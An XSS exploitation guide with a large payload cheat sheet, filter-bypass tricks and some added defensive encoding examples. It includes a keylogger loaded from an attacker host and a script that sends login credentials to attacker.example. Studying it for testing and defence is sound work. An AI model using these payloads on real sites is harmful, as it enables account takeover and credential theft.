XSS (Cross Site Scripting)
Methodology
- Check whether any value you control (parameters, path, headers?, cookies?) is reflected in the HTML or used by JS code.
- Find the context where it is reflected/used.
- If reflected:
  - Check which symbols you can use and, depending on that, prepare the payload:
    - In raw HTML:
      - Can you create new HTML tags?
      - Can you use events or attributes supporting the javascript: protocol?
      - Can you bypass protections?
      - Is the HTML content being interpreted by any client-side JS engine (AngularJS, VueJS, Mavo...)? You could abuse a Client Side Template Injection.
      - If you cannot create HTML tags that execute JS code, could you abuse a Dangling Markup - HTML scriptless injection?
    - Inside an HTML tag:
      - Can you exit to the raw HTML context?
      - Can you create new events/attributes to execute JS code?
      - Does the attribute you are trapped in support JS execution?
      - Can you bypass protections?
    - Inside JavaScript code:
      - Can you escape the <script> tag?
      - Can you escape the string and execute different JS code?
      - Is your input inside template literals ``?
      - Can you bypass protections?
  - JavaScript function being executed:
    - You can indicate the name of the function to execute, e.g.: ?callback=alert(1)
- If used:
  - You could exploit a DOM XSS; pay attention to how your input is controlled and whether your controlled input is used by any sink.
When working on a complex XSS you might find it useful to know about:
Reflected values
In order to successfully exploit an XSS the first thing you need to find is a value controlled by you that is being reflected in the web page.
- Intermediately reflected: If you find that the value of a parameter or even the path is being reflected in the web page you could exploit a Reflected XSS.
- Stored and reflected: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a Stored XSS.
- Accessed via JS: If you find that a value controlled by you is being accessed using JS you could exploit a DOM XSS.
Contexts
When trying to exploit an XSS the first thing you need to know is where your input is being reflected. Depending on the context, you will be able to execute arbitrary JS code in different ways.
Raw HTML
If your input is reflected in the raw HTML page you will need to abuse some HTML tag in order to execute JS code: <img , <iframe , <svg , <script ... these are just some of the many possible HTML tags you could use.
Also, keep in mind Client Side Template Injection.
Inside HTML tag attributes
If your input is reflected inside the value of an attribute of a tag you could try:
- To escape from the attribute and from the tag (then you will be in the raw HTML) and create a new HTML tag to abuse: "><img [...]
- If you can escape from the attribute but not from the tag (> is encoded or deleted), depending on the tag you could create an event that executes JS code: " autofocus onfocus=alert(1) x="
- If you cannot escape from the attribute (" is being encoded or deleted), then depending on which attribute your value is being reflected in and whether you control all of the value or only a part of it you will be able to abuse it. For example, if you control an event like onclick= you will be able to make it execute arbitrary code when it's clicked. Another interesting example is the attribute href, where you can use the javascript: protocol to execute arbitrary code: href="javascript:alert(1)"
- If your input is reflected inside "unexploitable tags" you could try the accesskey trick to abuse the vuln (you will need some kind of social engineering to exploit this): " accesskey="x" onclick="alert(1)" x="
Attribute-only login XSS behind WAFs
A corporate SSO integration reflected the OAuth service parameter inside the href attribute of <a id="forgot_btn" ...>. Although < and > were HTML-encoded, double quotes were not, so an attacker could close the attribute and reuse the same element to inject handlers like " onfocus="payload" x=".
- Inject a handler: Simple payloads like onclick="print(1)" were blocked, but the WAF only inspected the first JavaScript statement in inline attributes. Prepending a harmless expression wrapped in parentheses, followed by a semicolon, let the real payload run: onfocus="(history.length);malicious_code_here".
- Make it auto-trigger: Browsers give focus to any element whose id matches the URL fragment, so appending #forgot_btn to the attack URL forced the anchor to receive focus on page load and run the handler without a click.
- Keep the inline stub small: The target already loaded jQuery. The handler only needed to start a request via $.getScript(...) while the full keylogger lived on the attacker's server.
Building strings without quotes
Single quotes came back URL-encoded and escaped double quotes broke the attribute, so the payload built every string with String.fromCharCode. A helper makes it easy to convert any URL into char codes before pasting it into the attribute:
// Emit a JS statement that rebuilds `str` from char codes, so the
// resulting payload contains no quote characters at all
function toCharCodes(str) {
  const codes = [...str].map(c => c.charCodeAt(0)).join(',');
  return `const url = String.fromCharCode(${codes});`;
}
console.log(toCharCodes('https://attacker.tld/keylogger.js'));
The resulting attribute looked like:
onfocus="(history.length);const url=String.fromCharCode(104,116,116,112,115,58,47,47,97,116,116,97,99,107,101,114,46,116,108,100,47,107,101,121,108,111,103,103,101,114,46,106,115);$.getScript(url),function(){}"
Why this steals credentials
The external script (loaded from an attacker-controlled host or Burp Collaborator) hooked document.onkeypress, buffered keystrokes, and every second sent new Image().src = collaborator_url + keys. Because the XSS only fires for unauthenticated users, the sensitive step is the login form itself: the attacker keylogs usernames and passwords even if the victim never clicks "Login".
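The root cause above is an attribute value that was encoded for < and > only. The following added example (not code from the write-up or the affected product) contrasts that encoder with full attribute-context encoding and checks, on a constructed login-link template, whether the attribute-closing input shape from the write-up can add a handler:

```javascript
// Added example: attribute-context output encoding. The link template and the
// input below are constructed stand-ins for the SSO page described above.

// Mirrors the vulnerable behaviour: only < and > are escaped; the double quote
// that delimits the attribute is passed through untouched.
function encodeAnglesOnly(value) {
  return String(value).replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Attribute-context encoder: every character that can end a quoted attribute
// value or start an entity is escaped, so user data stays inside the quotes.
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Server-side template for the "forgot password" link, parameterised by encoder.
function renderForgotLink(serviceParam, encoder) {
  return `<a id="forgot_btn" href="/forgot?service=${encoder(serviceParam)}">Forgot password</a>`;
}

// Cheap check for the symptom the write-up describes: an injected handler shows
// up as an extra attribute on the anchor. Returns the attribute names the HTML
// tokenizer would see on the <a> tag.
function attributeNames(fragment) {
  const tag = fragment.match(/<a\b([^>]*)>/)[1];
  return tag.match(/\b[a-zA-Z-]+(?=="[^"]*")/g) || [];
}

// Constructed input shaped like the attribute-closing payload above, with a
// harmless handler body.
const ATTRIBUTE_CLOSING_INPUT = 'x" onfocus="(history.length);console.log(1)" x="';

function namesWithWeakEncoder() {
  return attributeNames(renderForgotLink(ATTRIBUTE_CLOSING_INPUT, encodeAnglesOnly));
}

function namesWithAttributeEncoder() {
  return attributeNames(renderForgotLink(ATTRIBUTE_CLOSING_INPUT, encodeForHtmlAttribute));
}

console.log(namesWithWeakEncoder());      // [ 'id', 'href', 'onfocus', 'x' ]
console.log(namesWithAttributeEncoder()); // [ 'id', 'href' ]
```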
Weird example of Angular executing XSS if you control the class name:
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
Inside JavaScript code
In this case your input is reflected between <script> [...] </script> tags of an HTML page, inside a .js file or inside an attribute using the javascript: protocol:
- If reflected between <script> [...] </script> tags, even if your input is inside any kind of quotes, you can try to inject </script> and escape from this context. This works because the browser will first parse the HTML tags and then the content, so it won't notice that your injected </script> tag is inside the HTML code.
- If reflected inside a JS string and the previous trick isn't working you would need to exit the string, execute your code and reconstruct the JS code (if there is any error, it won't be executed):
  '-alert(1)-'
  ';-alert(1)//
  \';alert(1)//
- If reflected inside template literals you can embed JS expressions using the ${ ... } syntax: var greetings = `Hello, ${alert(1)}`
- Unicode encoding works to write valid JavaScript code:
alert(1)
alert(1)
alert(1)
JavaScript Hoisting
JavaScript Hoisting refers to the ability to declare functions, variables or classes after they are used, so you can abuse scenarios where an XSS is using undeclared variables or functions.
Check the following page for more info:
Javascript Function
Several web pages have endpoints that accept as parameter the name of the function to execute. A common example to see in the wild is something like: ?callback=callbackFunc.
A good way to find out if something given directly by the user is trying to be executed is modifying the param value (for example to 'Vulnerable') and looking in the console for errors.
In case it's vulnerable, you could be able to trigger an alert just by sending the value ?callback=alert(1). However, it's very common that these endpoints validate the content to only allow letters, numbers, dots and underscores ([\w\._]).
However, even with that limitation it's still possible to perform some actions. This is because you can use those valid chars to access any element in the DOM:
Some useful functions for this:
firstElementChild
lastElementChild
nextElementSibling
previousElementSibling
parentElement
You can also try to trigger JavaScript functions directly: obj.sales.delOrders.
However, usually the endpoints executing the indicated function are endpoints without much interesting DOM; other pages in the same origin will have a more interesting DOM to perform more actions.
Therefore, in order to abuse this vulnerability in a different DOM the Same Origin Method Execution (SOME) exploitation was developed:
SOME - Same Origin Method Execution
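As an added illustration (not code from the page), the following Node script contrasts the [\w\._] character check described above with an explicit allowlist of callback names; the allowlist entries and the JSON body are constructed for the example:

```javascript
// Added example: why a character-class check on ?callback= is not a fix.
// The allowlist entries and the JSON body below are constructed for illustration.

// The check the page describes: letters, digits, dots and underscores only.
// It rejects "alert(1)" but accepts any dotted property path.
const WEAK_CALLBACK_RE = /^[\w\._]+$/;

function weakCallbackCheck(name) {
  return WEAK_CALLBACK_RE.test(name);
}

// The check a defender wants: the server only emits callback names it knows,
// e.g. a fixed prefix plus a nonce it issued itself (constructed values).
const ALLOWED_CALLBACKS = new Set(['jsonpCallback_a1b2c3', 'jsonpCallback_d4e5f6']);

function strictCallbackCheck(name) {
  return ALLOWED_CALLBACKS.has(name);
}

// Server-side rendering of the JSONP response body. Whatever passes `check`
// is emitted verbatim as a call expression that runs in the caller's page.
function renderJsonp(callbackName, payload, check) {
  if (!check(callbackName)) return null;
  return `${callbackName}(${JSON.stringify(payload)});`;
}

// Candidate callback names: a legitimate one, a direct call, a DOM traversal
// built only from the "valid" characters, and the page's method-call example.
const CANDIDATES = [
  'jsonpCallback_a1b2c3',
  'alert(1)',
  'document.body.firstElementChild.nextElementSibling.onclick',
  'obj.sales.delOrders',
];

function accepted(check) {
  return CANDIDATES.filter((name) => check(name));
}

console.log(accepted(weakCallbackCheck));
// [ 'jsonpCallback_a1b2c3', 'document.body.firstElementChild.nextElementSibling.onclick', 'obj.sales.delOrders' ]
console.log(accepted(strictCallbackCheck));
// [ 'jsonpCallback_a1b2c3' ]
console.log(renderJsonp('obj.sales.delOrders', { ok: true }, weakCallbackCheck));
// obj.sales.delOrders({"ok":true});
```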
DOM
There is JS code that is using unsafely some data controlled by an attacker like location.href. An attacker could abuse this to execute arbitrary JS code.
Universal XSS
These kinds of XSS can be found anywhere. They don't depend just on the client exploitation of a web application but on any context. These kinds of arbitrary JavaScript execution can even be abused to obtain RCE, read arbitrary files in clients and servers, and more.
Some examples:
WAF bypass encoding image
Injecting inside raw HTML
When your input is reflected inside the HTML page or you can escape and inject HTML code in this context, the first thing you need to do is check whether you can abuse < to create new tags: just try to reflect that char and check whether it's being HTML encoded or deleted or whether it is reflected without changes. Only in the last case will you be able to exploit this.
For these cases also keep in mind Client Side Template Injection.
Note: An HTML comment can be closed using --> or --!>
In this case and if no black/whitelisting is used, you could use payloads like:
<script>
alert(1)
</script>
<img src="x" onerror="alert(1)" />
<svg onload=alert('XSS')>
But, if tags/attributes black/whitelisting is being used, you will need to brute-force which tags you can create.
Once you have located which tags are allowed, you will need to brute-force attributes/events inside the found valid tags to see how you can attack the context.
Tags/Events brute-force
Go to https://portswigger.net/web-security/cross-site-scripting/cheat-sheet and click Copy tags to clipboard. Then, send all of them using Burp intruder and check whether any tag wasn't flagged as malicious by the WAF. Once you have discovered which tags you can use, you can brute force all the events using the valid tags (in the same web page click Copy events to clipboard and follow the same procedure as before).
Custom tags
If you didn't find any valid HTML tag, you could try to create a custom tag and execute JS code with the onfocus attribute. In the XSS request, you need to end the URL with # to make the page focus on that object and execute the code:
/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
Blacklist Bypasses
If some kind of blacklist is being used you could try to bypass it with some silly tricks:
//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG
//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>
//You can substitute the space that separates attributes with:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09
//Unexpected parent tags
<svg><x><script>alert('1')</x>
//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //
//Extra open
<<script>alert("XSS");//<</script>
//Just weird and unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">
//Using `` instead of parenthesis
onerror=alert`1`
//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
Length bypass (small XSSs)
Note: Tiny XSS payloads for different environments can be found here and here.
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``> <script src=//aa.es> <script src=//℡㏛.pw>
The last one uses 2 unicode characters which expand to 5: telsr
More of these characters can be found here.
To check which characters are decomposed check here.
Click XSS - Clickjacking
If in order to exploit the vulnerability you need the user to click a link or a form with prepopulated data you could try to abuse Clickjacking (if the page is vulnerable).
Impossible - Dangling Markup
If you just think that it's impossible to create an HTML tag with an attribute to execute JS code, you should check Dangling Markup because you could exploit the vulnerability without executing JS code.
Injecting inside HTML tag
Inside the tag/escaping from attribute value
If you are inside an HTML tag, the first thing you could try is to escape from the tag and use some of the techniques mentioned in the previous section to execute JS code.
If you cannot escape from the tag, you could create new attributes inside the tag to try to execute JS code, for example using a payload like the following (note that in this example double quotes are used to escape from the attribute; you won't need them if your input is reflected directly inside the tag):
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
Style events
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>
#Payload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#Payload that triggers when moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
Inside the attribute
Even if you cannot escape from the attribute (" is being encoded or deleted), depending on which attribute your value is being reflected in and whether you control all of the value or only a part of it you will be able to abuse it. For example, if you control an event like onclick= you will be able to make it execute arbitrary code when it's clicked.
Another interesting example is the attribute href, where you can use the javascript: protocol to execute arbitrary code: href="javascript:alert(1)"
Bypass inside event using HTML encoding/URL encode
The HTML encoded characters inside the value of HTML tag attributes are decoded at runtime. Therefore something like the following will be valid (the payload is &apos;-alert(1)-&apos;): <a id="author" href="http://none" onclick="var tracker='http://foo?&apos;-alert(1)-&apos;';">Go Back </a>
Note that any kind of HTML encode is valid:
//HTML entities
&apos;-alert(1)-&apos;
//HTML hex without zeros
&#x27;-alert(1)-&#x27;
//HTML hex with zeros
&#x00027;-alert(1)-&#x00027;
//HTML dec without zeros
&#39;-alert(1)-&#39;
//HTML dec with zeros
&#00039;-alert(1)-&#00039;
<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="javascript:alert(2)">a</a>
<a href="javascript:alert(3)">a</a>
Note that URL encode will also work:
<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
Bypass inside event using Unicode encode
//For some reason you can use unicode to encode "alert" but not "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
Special Protocols Within the attribute
There you can use the protocols javascript: or data: in some places to execute arbitrary JS code. Some will require user interaction and some won't.
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
java //Note the new line
script:alert(1)
data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
Places where you can inject these protocols
In general the javascript: protocol can be used in any tag that accepts the attribute href and in most of the tags that accept the attribute src (but not <img)
<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>
//Special cases
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">
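The two sections above (HTML character references decoded inside attribute values, and the javascript:/data: scheme variants that browsers still accept) both describe how an attribute value is normalised before it is used. The following added example (not code from the page) implements that normalisation the way a defender would in a scanner or a server-side link check: decode character references as the HTML tokenizer does, strip the whitespace the URL parser ignores, and only then read the scheme. The sample values are constructed from the payload forms shown on the page.

```javascript
// Added example: normalise an attribute value the way a browser would before
// classifying its URL scheme. The entity table covers the references used on this page.
const NAMED_REFS = {
  amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", Tab: '\t', NewLine: '\n', colon: ':',
};

// Decode numeric references (with or without the trailing semicolon, which the
// HTML tokenizer tolerates) and the named references above (semicolon required).
function decodeHtmlEntities(text) {
  return text.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?|&([a-z]+);/gi, (match, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? match : String.fromCodePoint(cp);
    }
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : match;
  });
}

// Return the lower-cased URL scheme the browser would act on, or null if the value
// has no scheme. Leading/trailing C0 controls and spaces are trimmed and tab, LF and
// CR are removed anywhere, which is why "java<newline>script:" still counts.
function effectiveScheme(attrValue) {
  const normalised = decodeHtmlEntities(attrValue)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = normalised.match(/^([a-z][a-z0-9+.-]*):/i);
  return m ? m[1].toLowerCase() : null;
}

// Schemes that execute code or render attacker markup when used in href/src/data.
const SCRIPTING_SCHEMES = new Set(['javascript', 'data']);

function isScriptingUrl(attrValue) {
  return SCRIPTING_SCHEMES.has(effectiveScheme(attrValue));
}

// Constructed samples following the page's variants, plus two benign values.
const SAMPLES = [
  'javascript:alert(1)',
  'JavaSCript:alert(1)',
  'java\nscript:alert(1)',
  '&#106;avascript:alert(1)',
  '&#x6A;avascript:alert(1)',
  '  &Tab;javascript:alert(1)',
  'DaTa:text/html,<script>alert(1)</script>',
  'https://example.com/?next=javascript:alert(1)',
  '/relative/path',
];

function flagged() {
  return SAMPLES.filter(isScriptingUrl);
}

console.log(flagged().length); // 7
console.log(decodeHtmlEntities('&#x00027;-alert(1)-&#00039;')); // '-alert(1)-'
```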
Other obfuscation tricks
In this case the HTML encoding and the Unicode encoding trick from the previous section are also valid as you are inside an attribute.
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
Moreover, there is another nice trick for these cases: Even if your input inside javascript:... is being URL encoded, it will be URL decoded before it's executed. So, if you need to escape from the string using a single quote and you see that it's being URL encoded, remember that it doesn't matter, it will be interpreted as a single quote during execution.
&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
Note that if you try to use both URLencode + HTMLencode in any order to encode the payload it won't work, but you can mix them inside the payload.
Using Hex and Octal encode with javascript:
You can use Hex and Octal encode inside the src attribute of iframe (at least) to declare HTML tags to execute JS:
//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />
//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
Reverse tab nabbing
<a target="_blank" rel="opener"
If you can inject any URL in an arbitrary <a href= tag that contains the attributes target="_blank" and rel="opener", check the following page to exploit this behavior:
on Event Handlers Bypass
First of all check this page (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) for useful "on" event handlers.
In case there is some blacklist preventing you from creating these event handlers you can try the following bypasses:
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
XSS in “Unexploitable tags” (hidden input, link, canonical, meta)
From here it's now possible to abuse hidden inputs with:
<button popovertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle="alert(1)" />
And in meta tags:
<!-- Injection inside meta attribute-->
<meta
name="apple-mobile-web-app-title"
content=""
Twitter
popover
id="newsletter"
onbeforetoggle="alert(2)" />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
From here: You can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
<input type="hidden" accesskey="X" onclick="alert(1)">
The XSS payload will be something like this: " accesskey="x" onclick="alert(1)" x="
Blacklist Bypasses
Several tricks using different encodings have already been exposed in this section. Go back to learn where you can use:
- HTML encoding (HTML tags)
- Unicode encoding (can be valid JS code): \u0061lert(1)
- URL encoding
- Hex and Octal encoding
- data encoding
Bypasses for HTML tags and attributes
Read the Blacklist Bypasses of the previous section.
Bypasses for JavaScript code
Read the JavaScript bypass blacklist of the following section.
CSS-Gadgets
If you found an XSS in a very small part of the web that requires some kind of interaction (maybe a small link in the footer with an onmouseover element), you can try to modify the space that element occupies to maximize the probability of having the link fired.
For example, you could add some styling in the element like: position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5
But, if the WAF is filtering the style attribute, you can use CSS Styling Gadgets, so if you find, for example
.test {display:block; color: blue; width: 100%}
and
#someid {top: 0; font-family: Tahoma;}
Now you can modify your link and bring it to the form
<a href="" id=someid class=test onclick=alert() a="">
This trick was taken from https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703
Injecting inside JavaScript code
In these cases your input is going to be reflected inside the JS code of a .js file or between <script>...</script> tags or between HTML events that can execute JS code or between attributes that accept the javascript: protocol.
Escaping the <script> tag
If your code is inserted within <script> [...] var input = 'reflected data' [...] </script> you could easily escape by closing the <script> tag:
</script><img src=1 onerror=alert(document.domain)>
Note that in this example we haven't even closed the single quote. This is because HTML parsing is performed first by the browser, which involves identifying page elements, including blocks of script. The parsing of JavaScript to understand and execute the embedded scripts is only performed afterwards.
Inside JS code
If <> are being sanitised you can still escape the string where your input is located and execute arbitrary JS. It's important to fix the JS syntax, because if there are any errors, the JS code won't be executed:
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
JS-in-JS string break → inject → repair pattern
When user input lands inside a quoted JavaScript string (e.g., a server-side echo into an inline script), you can terminate the string, inject code, and repair the syntax so that parsing stays valid. Generic pattern:
" // end original string
; // safely terminate the statement
<INJECTION> // attacker-controlled JS
; a = " // repair and resume expected string/statement
Example URL structure when the vulnerable parameter is reflected inside a JS string:
?param=test";<INJECTION>;a="
This executes attacker JS without needing to touch the HTML context (pure JS-in-JS). Combine it with the blacklist bypasses below when filters block keywords.
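From the defender's side, the </script> break and the string-break-and-repair pattern above are both consequences of concatenating user data into an inline script. The following added example (not code from the page) shows the naive rendering, the common half-fix (JSON.stringify alone) and a safe encoder, and checks each against the two payload shapes from this section plus the U+2028 line separator; the templates and sample inputs are constructed.

```javascript
// Added example: embedding user data in an inline <script> safely. Templates and
// sample inputs are constructed; the payload shapes follow the page.

// Naive: raw concatenation inside a quoted JS string.
function renderInlineScriptNaive(userValue) {
  return `<script>var input = '${userValue}';</script>`;
}

// Half-fix: JSON.stringify handles quotes and backslashes, but leaves "<" alone,
// so a "</script>" inside the value still ends the script element.
function renderInlineScriptJsonOnly(userValue) {
  return `<script>var input = ${JSON.stringify(userValue)};</script>`;
}

// Safe: JSON-encode, then escape the characters that matter to the HTML parser
// (< > &) and the U+2028/U+2029 line terminators as JS unicode escapes.
function jsStringForInlineScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderInlineScriptSafe(userValue) {
  return `<script>var input = ${jsStringForInlineScript(userValue)};</script>`;
}

// The HTML tokenizer ends script data at the first "</script", whatever the JS
// quoting state, so more than one occurrence means the script was cut short.
function scriptEndTagsSeenByHtmlParser(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// True when the rendered HTML still contains a raw U+2028/U+2029 character.
function hasRawLineTerminator(html) {
  return /[\u2028\u2029]/.test(html);
}

// Evaluate the script body the way the browser would (after HTML parsing) and
// report what `input` ended up holding, or null if the value escaped the string
// (detected via the `injected` marker) or the script no longer parses.
function roundTrip(render, userValue) {
  const html = render(userValue);
  if (scriptEndTagsSeenByHtmlParser(html) !== 1) return null;
  const body = html.slice('<script>'.length, html.lastIndexOf('</script>'));
  try {
    const run = new Function('injected', body + '\nreturn { input, injected };');
    const out = run(0);
    return out.injected === 0 ? out.input : null;
  } catch (e) {
    return null;
  }
}

// Constructed inputs: the page's </script> escape and its string-break pattern,
// with a marker assignment standing in for the injected code.
const SAMPLES = {
  scriptBreak: '</script><img src=1 onerror=alert(document.domain)>',
  stringBreak: "test';injected=1;//",
};

// For each sample: does the value come back intact, with no injected code run?
function survives(render) {
  return Object.fromEntries(
    Object.entries(SAMPLES).map(([k, v]) => [k, roundTrip(render, v) === v]),
  );
}

console.log(survives(renderInlineScriptNaive));    // { scriptBreak: false, stringBreak: false }
console.log(survives(renderInlineScriptJsonOnly)); // { scriptBreak: false, stringBreak: true }
console.log(survives(renderInlineScriptSafe));     // { scriptBreak: true, stringBreak: true }
console.log(hasRawLineTerminator(renderInlineScriptJsonOnly('a\u2028b'))); // true
console.log(hasRawLineTerminator(renderInlineScriptSafe('a\u2028b')));     // false
```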
Template literals ``
In order to construct strings apart from single and double quotes, JS also accepts backticks ``. This is known as template literals as they allow embedded JS expressions using the ${ ... } syntax.
Therefore, if you find that your input is being reflected inside a JS string that is using backticks, you can abuse the ${ ... } syntax to execute arbitrary JS code:
This can be abused using:
;`${alert(1)}``${`${`${`${alert(1)}`}`}`}`
// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop() {
return loop
}
loop``
Encoded code execution
<script>\u0061lert(1)</script>
<svg><script>alert('1')
<svg><script>alert(1)</script></svg> <!-- The svg tags are necessary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
Payloads deliverable with eval(atob()) and scope nuances
To keep URLs short and bypass naive keyword filters, you can base64-encode your real logic and execute it with eval(atob('...')). If naive keyword filtering blocks identifiers like alert, eval, or atob, use Unicode-escaped identifiers that compile the same way in the browser but evade string-matching filters:
\u0061\u006C\u0065\u0072\u0074(1) // alert(1)
\u0065\u0076\u0061\u006C(\u0061\u0074\u006F\u0062('BASE64')) // eval(atob('...'))
Important scoping difference:
const/let declared inside eval() are block-scoped and won't create globals; they won't be visible to later scripts. Use an injected <script> element at runtime to define global, non-rebindable hooks when needed (e.g., to hijack a form handler):
var s = document.createElement('script');
s.textContent = "const DoLogin = () => {const pwd = Trim(FormInput.InputPassword.value); const user = Trim(FormInput.InputUtente.value); fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));}";
document.head.appendChild(s);
References: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval
JS execution (Unicode Encode)
alert(1)
alert(1)
alert(1)
